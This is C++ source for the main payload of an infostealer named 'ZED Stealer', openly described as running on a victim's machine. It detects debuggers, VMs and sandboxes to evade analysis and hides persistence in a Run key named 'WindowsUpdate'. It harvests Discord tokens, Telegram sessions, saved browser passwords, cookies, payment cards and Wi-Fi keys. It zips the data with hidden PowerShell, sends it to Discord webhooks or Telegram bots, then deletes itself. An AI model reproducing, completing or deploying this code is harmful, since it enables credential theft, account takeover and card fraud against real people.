//
// ZED Stealer — Payload Entry Point
// Runs on the victim machine, collects data and exfiltrates via configured delivery.
//
#include "config.h"           // Generated by ZED Builder
#include "../cpp/stealer.h"
#include <windows.h>
#include <shlobj.h>
#include <filesystem>
#include <string>
#include <vector>
#include <fstream>
#include <sstream>

namespace fs = std::filesystem;

// ── Anti-Analysis ─────────────────────────────────────────────────────────────

#if ZED_ANTI_DEBUG
static bool is_debugger_present() {
    if (IsDebuggerPresent()) return true;
    BOOL remote = FALSE;
    CheckRemoteDebuggerPresent(GetCurrentProcess(), &remote);
    return remote != FALSE;
}
#endif

#if ZED_ANTI_VM
static bool is_vm() {
    const char* vm_keys[] = {
        "HARDWARE\\ACPI\\DSDT\\VBOX__",
        "HARDWARE\\ACPI\\FADT\\VBOX__",
        "HARDWARE\\ACPI\\RSDT\\VBOX__",
        "SOFTWARE\\Oracle\\VirtualBox Guest Additions",
        "SYSTEM\\ControlSet001\\Services\\VBoxGuest",
        "SYSTEM\\ControlSet001\\Services\\vmhgfs",
        "SYSTEM\\ControlSet001\\Services\\VMTools",
        nullptr
    };
    for (int i = 0; vm_keys[i]; i++) {
        HKEY hKey;
        if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, vm_keys[i], 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
            RegCloseKey(hKey);
            return true;
        }
    }
    LARGE_INTEGER t1, t2;
    QueryPerformanceCounter(&t1);
    Sleep(10);
    QueryPerformanceCounter(&t2);
    if ((t2.QuadPart - t1.QuadPart) < 5000) return true;
    return false;
}
#endif

#if ZED_ANTI_SANDBOX
#include <psapi.h>
#pragma comment(lib, "psapi.lib")
static bool is_sandbox() {
    if (GetTickCount64() < 5 * 60 * 1000) return true;
    DWORD pids[1024]; DWORD needed = 0;
    if (EnumProcesses(pids, sizeof(pids), &needed)) {
        if (needed / sizeof(DWORD) < 30) return true;
    }
    return false;
}
#endif

// ── Helpers ───────────────────────────────────────────────────────────────────

static std::string get_temp_dir() {
    char buf[MAX_PATH];
    GetTempPathA(sizeof(buf), buf);
    return std::string(buf);
}

static std::string unique_dir() {
    std::string tmp = get_temp_dir();
    char name[64];
    snprintf(name, sizeof(name), "upd_%08X", (unsigned)GetTickCount());
    std::string dir = tmp + name;
    CreateDirectoryA(dir.c_str(), nullptr);
    return dir + "\\";
}

static void write_file(const std::string& path, const std::string& content) {
    std::ofstream f(path, std::ios::binary);
    f.write(content.data(), content.size());
}

static void delete_dir_recursive(const std::string& dir) {
    try { fs::remove_all(dir); } catch (...) {}
}

// ── Mutex (single-instance guard) ────────────────────────────────────────────

#if ZED_MUTEX_ENABLED
static bool acquire_mutex() {
    HANDLE h = CreateMutexA(nullptr, TRUE, ZED_MUTEX_NAME);
    return GetLastError() != ERROR_ALREADY_EXISTS;
}
#endif

// ── Persistence ───────────────────────────────────────────────────────────────

#if ZED_PERSISTENCE
static void install_persistence() {
    char self_path[MAX_PATH];
    GetModuleFileNameA(nullptr, self_path, sizeof(self_path));

    char dest[MAX_PATH];
    SHGetFolderPathA(nullptr, CSIDL_APPDATA, nullptr, 0, dest);
    std::string dst = std::string(dest) + "\\" ZED_OUTPUT_NAME;
    CopyFileA(self_path, dst.c_str(), FALSE);

    HKEY hKey;
    if (RegOpenKeyExA(HKEY_CURRENT_USER,
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
        RegSetValueExA(hKey, "WindowsUpdate", 0, REG_SZ,
                       (LPBYTE)dst.c_str(), (DWORD)dst.size() + 1);
        RegCloseKey(hKey);
    }
}
#endif

// ── Self-Delete (Melt) ────────────────────────────────────────────────────────

#if ZED_MELT
static void melt_self() {
    char self_path[MAX_PATH];
    GetModuleFileNameA(nullptr, self_path, sizeof(self_path));
    std::string tmp_path = std::string(self_path) + ".tmp";
    MoveFileA(self_path, tmp_path.c_str());
    MoveFileExA(tmp_path.c_str(), nullptr, MOVEFILE_DELAY_UNTIL_REBOOT);
}
#endif

// ── Self-Destruct ─────────────────────────────────────────────────────────────

#if ZED_SELF_DESTRUCT
static void self_destruct() {
    // Remove all registry Run entries added by ZED
    HKEY hKey;
    if (RegOpenKeyExA(HKEY_CURRENT_USER,
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
        RegDeleteValueA(hKey, "WindowsUpdate");
        RegCloseKey(hKey);
    }
    // Delete self immediately
    char self_path[MAX_PATH];
    GetModuleFileNameA(nullptr, self_path, sizeof(self_path));
    // Schedule deletion via cmd after process exits
    char cmd[512];
    snprintf(cmd, sizeof(cmd),
             "cmd /C ping 127.0.0.1 -n 2 >nul && del /F /Q \"%s\"", self_path);
    STARTUPINFOA si = {}; si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE;
    PROCESS_INFORMATION pi = {};
    CreateProcessA(nullptr, cmd, nullptr, nullptr, FALSE,
                   CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi);
}
#endif

// ── Data Collection ───────────────────────────────────────────────────────────

static std::string browser_filter() {
    std::string f;
#if ZED_TARGET_CHROME && !ZED_TARGET_FIREFOX && !ZED_TARGET_EDGE && !ZED_TARGET_BRAVE && !ZED_TARGET_OPERA
    f = "chrome";
#elif ZED_TARGET_FIREFOX && !ZED_TARGET_CHROME && !ZED_TARGET_EDGE && !ZED_TARGET_BRAVE && !ZED_TARGET_OPERA
    f = "firefox";
#elif ZED_TARGET_EDGE && !ZED_TARGET_CHROME && !ZED_TARGET_FIREFOX && !ZED_TARGET_BRAVE && !ZED_TARGET_OPERA
    f = "edge";
#elif ZED_TARGET_BRAVE && !ZED_TARGET_CHROME && !ZED_TARGET_FIREFOX && !ZED_TARGET_EDGE && !ZED_TARGET_OPERA
    f = "brave";
#elif ZED_TARGET_OPERA && !ZED_TARGET_CHROME && !ZED_TARGET_FIREFOX && !ZED_TARGET_EDGE && !ZED_TARGET_BRAVE
    f = "opera";
#else
    f = "all";
#endif
    return f;
}

static void collect_all(const std::string& out_dir) {
    char buf[524288];  // 512 KB shared buffer
    std::string bfilter = browser_filter();

#if ZED_FEAT_DISCORD_TOKENS
    if (zed_discord_grab_tokens(buf, sizeof(buf)) > 0)
        write_file(out_dir + "discord_tokens.txt", std::string(buf));
#endif

#if ZED_FEAT_DISCORD_FRIENDS
    // Friends list is fetched via the same token — placeholder for now
    // (requires API call per token after extraction)
#endif

#if ZED_FEAT_TELEGRAM_SESSIONS
    zed_telegram_grab_sessions((out_dir + "telegram").c_str());
#endif

#if ZED_FEAT_BROWSER_PASSWORDS
    if (zed_browser_dump_passwords(bfilter.c_str(), buf, sizeof(buf)) > 0)
        write_file(out_dir + "passwords.json", std::string(buf));
#endif

#if ZED_FEAT_BROWSER_COOKIES
    if (zed_browser_dump_cookies(bfilter.c_str(), buf, sizeof(buf)) > 0)
        write_file(out_dir + "cookies.json", std::string(buf));
#endif

#if ZED_FEAT_BROWSER_CARDS
    if (zed_browser_dump_cards(bfilter.c_str(), buf, sizeof(buf)) > 0)
        write_file(out_dir + "cards.json", std::string(buf));
#endif

#if ZED_FEAT_BROWSER_HISTORY
    if (zed_browser_dump_history(bfilter.c_str(), buf, sizeof(buf)) > 0)
        write_file(out_dir + "history.json", std::string(buf));
#endif

#if ZED_FEAT_SYSTEM_INFO || ZED_FEAT_HARDWARE
    if (zed_system_collect_info(buf, sizeof(buf)) == 1)
        write_file(out_dir + "sysinfo.json", std::string(buf));
#endif

#if ZED_FEAT_NETWORK
    if (zed_network_get_geo(buf, sizeof(buf)) == 1)
        write_file(out_dir + "network.json", std::string(buf));
#endif

#if ZED_FEAT_SCREENSHOT
    zed_system_screenshot((out_dir + "screenshot.bmp").c_str());
#endif

#if ZED_FEAT_CLIPBOARD
    if (zed_system_clipboard(buf, sizeof(buf)) > 0)
        write_file(out_dir + "clipboard.txt", std::string(buf));
#endif

#if ZED_FEAT_WIFI
    if (zed_system_wifi_passwords(buf, sizeof(buf)) > 0)
        write_file(out_dir + "wifi.json", std::string(buf));
#endif

#if ZED_FEAT_INSTALLED_APPS
    if (zed_system_installed_apps(buf, sizeof(buf)) > 0)
        write_file(out_dir + "apps.json", std::string(buf));
#endif

#if ZED_FEAT_STARTUP_FILES
    if (zed_system_startup_items(buf, sizeof(buf)) > 0)
        write_file(out_dir + "startup.json", std::string(buf));
#endif
}

// ── Pack output directory into ZIP ───────────────────────────────────────────

static std::string pack_output_dir(const std::string& dir) {
    std::string zip = dir + "..\\zed_data.zip";
    std::string cmd = "powershell -WindowStyle Hidden -Command "
                      "\"Compress-Archive -Path '" + dir + "*' -DestinationPath '" + zip + "' -Force\"";
    STARTUPINFOA si = {}; si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE;
    PROCESS_INFORMATION pi = {};
    if (CreateProcessA(nullptr, (LPSTR)cmd.c_str(), nullptr, nullptr, FALSE,
                       CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, 30000);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    return zip;
}

// ── Delivery ──────────────────────────────────────────────────────────────────

static void deliver(const std::string& zip_path) {
    char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {};
    DWORD hsz = sizeof(hostname);
    GetComputerNameA(hostname, &hsz);
    char username[256] = {};
    DWORD usz = sizeof(username);
    GetUserNameA(username, &usz);
    std::string caption = std::string("[ZED] ") + username + "@" + hostname;

#if ZED_USE_DISCORD
    zed_deliver_discord(ZED_DISCORD_WEBHOOK, zip_path.c_str(), caption.c_str());
#endif

#if ZED_USE_TELEGRAM
    zed_deliver_telegram(ZED_TELEGRAM_TOKEN, ZED_TELEGRAM_CHAT_ID,
                         zip_path.c_str(), caption.c_str());
#endif
}

// ── Nitro check (runs after token collection) ─────────────────────────────────

#if ZED_FEAT_DISCORD_NITRO
static void check_tokens_nitro(const std::string& out_dir) {
    std::string token_file = out_dir + "discord_tokens.txt";
    std::ifstream f(token_file);
    if (!f.is_open()) return;
    std::ofstream valid_out(out_dir + "discord_valid_tokens.txt");
    std::string line;
    while (std::getline(f, line)) {
        if (!line.empty() && zed_discord_check_token(line.c_str()) == 1)
            valid_out << line << "\n";
    }
}
#endif

// ── Entry Point ───────────────────────────────────────────────────────────────

int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
#if ZED_ANTI_DEBUG
    if (is_debugger_present()) return 0;
#endif
#if ZED_ANTI_VM
    if (is_vm()) return 0;
#endif
#if ZED_ANTI_SANDBOX
    if (is_sandbox()) return 0;
#endif

#if ZED_MUTEX_ENABLED
    if (!acquire_mutex()) return 0;
#endif

#if ZED_PERSISTENCE
    install_persistence();
#endif

    std::string out_dir = unique_dir();
    collect_all(out_dir);

#if ZED_FEAT_DISCORD_NITRO
    check_tokens_nitro(out_dir);
#endif

    std::string zip = pack_output_dir(out_dir);
    deliver(zip);

    delete_dir_recursive(out_dir);
    try { fs::remove(zip); } catch (...) {}

#if ZED_SELF_DESTRUCT
    self_destruct();
#elif ZED_MELT
    melt_self();
#endif

    return 0;
}
